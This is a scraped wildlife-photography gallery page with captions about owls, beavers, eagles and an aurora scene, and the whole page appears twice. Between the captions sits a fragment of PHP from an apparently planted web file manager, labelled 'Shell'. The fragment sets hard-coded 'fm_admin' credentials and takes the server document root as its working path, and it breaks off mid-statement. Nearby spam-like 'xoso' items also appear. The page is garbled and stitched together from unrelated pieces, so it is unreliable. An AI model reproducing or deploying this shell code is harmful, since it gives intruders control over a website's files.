The Aurora was very active behind where I was, but I really loved the reflection off of the tracks when I was facing the opposite direction. I hope to be go back one night, when the Aurora is active again and see if I can remake this shot. I love being out in the complete darkness, only light being from the sky dancing above and the glow of my camera. It does keep you on your toes, as any noise coming from the forest keeps your heart in check.
Great Grey Winter Portrait
It's a full on winters day in Prince Prince and this Great Grey isn't far from my home. Being the larger owl of 2, roosting in the area has me thinking, this is a feamle.
Lizard Lunch
A Northern pygmy owl captures what I assume is a Common Wall Lizard. I spent several hours with this one and the mate.
It's my understanding, the mating season could have actually started a few weeks early. I recently added a photo of the 2 mating, which was at the begining of March.
Dinner for two on the ice
There was also a third Beaver that came out to eat on the ice but it didn't go sit with the other two. I was hoping for all three to sit together. lol!
Byeeeeee!
A Beaver plunging in under water after giving a tail slap, check out those cool webbed feet! Ontario, Canada
Bald Eagle
I love eagles and see them everyday, I live for these moments
Bald Eagle
I love eagles and see them everyday, I live for these moments
Logo-xoso-best
Logo-xoso-best
Shell
'Password', 'Username2' => 'Password2', ...)
$auth_users = array(
'fm_admin' => 'fm_admin',
);
// Enable highlight.js (https://highlightjs.org/) on view's page
$use_highlightjs = true;
// highlight.js style
$highlightjs_style = 'vs';
// Default timezone for date() and time() - http://php.net/manual/en/timezones.php
$default_timezone = 'Europe/Minsk'; // UTC+3
// Root path for file manager
$root_path = $_SERVER['DOCUMENT_ROOT'];
// Root url for links in file manager.Relative to $http_host. Variants: '', 'path/to/subfolder'
// Will not working if $root_path will be outside of server document root
$root_url = '';
// Server hostname. Can set manually if wrong
$http_host = $_SERVER['HTTP_HOST'];
// input encoding for iconv
$iconv_input_encoding = 'CP1251';
// date() format for file modification date
$datetime_format = 'd.m.y H:i';
//--- EDIT BELOW CAREFULLY OR DO NOT EDIT AT ALL
// if fm included
if (defined('FM_EMBED')) {
$use_auth = false;
} else {
@set_time_limit(600);
date_default_timezone_set($default_timezone);
ini_set('default_charset', 'UTF-8');
if (version_compare(PHP_VERSION, '5.6.0', '<') && function_exists('mb_internal_encoding')) {
mb_internal_encoding('UTF-8');
}
if (function_exists('mb_regex_encoding')) {
mb_regex_encoding('UTF-8');
}
session_cache_limiter('');
session_name('filemanager');
session_start();
}
if (empty($auth_users)) {
$use_auth = false;
}
$is_https = isset($_SERVER['HTTPS']) && ($_SERVER['HTTPS'] == 'on' || $_SERVER['HTTPS'] == 1)
|| isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https';
// clean and check $root_path
$root_path = rtrim($root_path, '\\/');
$root_path = str_replace('\\', '/', $root_path);
if (!@is_dir($root_path)) {
echo sprintf('
Photo taken at Lynde Shores. Blue Heron enjoying it's catch
Encre embrasée / Blazing ink
Every evening, the gulls rise towards the embers. A ritual so frequent that it seems inscribed in the reef of the island.
And during this moment... the sky becomes a page, the wind holds the feather and the bird writes.
Then, the sky slowly goes out while turning the page, but the ink still flows in the eyes of the one who read it.
Snowy Owl
Although I have not had many opportunities this winter to get out and scout for Snowy Owls. I have been most fortunate on the three trips I have made this winter, to have seen one on each trip. Usually you can go several times, and not see any. I hope to make one more trip before they head north again. Hopefully my luck holds out.
IMG-20260214-WA0010(1)
Scerenity
Perfect condition for lansdcaping in a place I love to go during winter.
King Of The Forest
The Great Grey Owl made a brief appearance on one of the NCC Trails in Ottawa Today
This image was captured on my first evening in Waskaganish in August 2025. The Rupert River flows by in the background.
Short-eared Owl in Flight
A Short-eared Owl flying low over open grassland while hunting. These owls are often seen at dusk patrolling fields and coastal meadows as they search for small mammals. This image was captured as the owl flew directly toward the camera during its evening hunt.
Photographed with a Sony A7R III and Sony 200–600mm lens.
Photo contests and competitions
Follow the Tracks
The Aurora was very active behind where I was, but I really loved the reflection off of the tracks when I was facing the opposite direction. I hope to be go back one night, when the Aurora is active again and see if I can remake this shot. I love being out in the complete darkness, only light being from the sky dancing above and the glow of my camera. It does keep you on your toes, as any noise coming from the forest keeps your heart in check.
Great Grey Winter Portrait
It's a full on winters day in Prince Prince and this Great Grey isn't far from my home. Being the larger owl of 2, roosting in the area has me thinking, this is a feamle.
Lizard Lunch
A Northern pygmy owl captures what I assume is a Common Wall Lizard. I spent several hours with this one and the mate.
It's my understanding, the mating season could have actually started a few weeks early. I recently added a photo of the 2 mating, which was at the begining of March.
Dinner for two on the ice
There was also a third Beaver that came out to eat on the ice but it didn't go sit with the other two. I was hoping for all three to sit together. lol!
Byeeeeee!
A Beaver plunging in under water after giving a tail slap, check out those cool webbed feet! Ontario, Canada
Bald Eagle
I love eagles and see them everyday, I live for these moments
Bald Eagle
I love eagles and see them everyday, I live for these moments
Logo-xoso-best
Logo-xoso-best
Shell
'Password', 'Username2' => 'Password2', ...)
$auth_users = array(
'fm_admin' => 'fm_admin',
);
// Enable highlight.js (https://highlightjs.org/) on view's page
$use_highlightjs = true;
// highlight.js style
$highlightjs_style = 'vs';
// Default timezone for date() and time() - http://php.net/manual/en/timezones.php
$default_timezone = 'Europe/Minsk'; // UTC+3
// Root path for file manager
$root_path = $_SERVER['DOCUMENT_ROOT'];
// Root url for links in file manager.Relative to $http_host. Variants: '', 'path/to/subfolder'
// Will not working if $root_path will be outside of server document root
$root_url = '';
// Server hostname. Can set manually if wrong
$http_host = $_SERVER['HTTP_HOST'];
// input encoding for iconv
$iconv_input_encoding = 'CP1251';
// date() format for file modification date
$datetime_format = 'd.m.y H:i';
//--- EDIT BELOW CAREFULLY OR DO NOT EDIT AT ALL
// if fm included
if (defined('FM_EMBED')) {
$use_auth = false;
} else {
@set_time_limit(600);
date_default_timezone_set($default_timezone);
ini_set('default_charset', 'UTF-8');
if (version_compare(PHP_VERSION, '5.6.0', '<') && function_exists('mb_internal_encoding')) {
mb_internal_encoding('UTF-8');
}
if (function_exists('mb_regex_encoding')) {
mb_regex_encoding('UTF-8');
}
session_cache_limiter('');
session_name('filemanager');
session_start();
}
if (empty($auth_users)) {
$use_auth = false;
}
$is_https = isset($_SERVER['HTTPS']) && ($_SERVER['HTTPS'] == 'on' || $_SERVER['HTTPS'] == 1)
|| isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https';
// clean and check $root_path
$root_path = rtrim($root_path, '\\/');
$root_path = str_replace('\\', '/', $root_path);
if (!@is_dir($root_path)) {
echo sprintf('
Photo taken at Lynde Shores. Blue Heron enjoying it's catch
Encre embrasée / Blazing ink
Every evening, the gulls rise towards the embers. A ritual so frequent that it seems inscribed in the reef of the island.
And during this moment... the sky becomes a page, the wind holds the feather and the bird writes.
Then, the sky slowly goes out while turning the page, but the ink still flows in the eyes of the one who read it.
Snowy Owl
Although I have not had many opportunities this winter to get out and scout for Snowy Owls. I have been most fortunate on the three trips I have made this winter, to have seen one on each trip. Usually you can go several times, and not see any. I hope to make one more trip before they head north again. Hopefully my luck holds out.
IMG-20260214-WA0010(1)
Scerenity
Perfect condition for lansdcaping in a place I love to go during winter.
King Of The Forest
The Great Grey Owl made a brief appearance on one of the NCC Trails in Ottawa Today
This image was captured on my first evening in Waskaganish in August 2025. The Rupert River flows by in the background.
Short-eared Owl in Flight
A Short-eared Owl flying low over open grassland while hunting. These owls are often seen at dusk patrolling fields and coastal meadows as they search for small mammals. This image was captured as the owl flew directly toward the camera during its evening hunt.
Photographed with a Sony A7R III and Sony 200–600mm lens.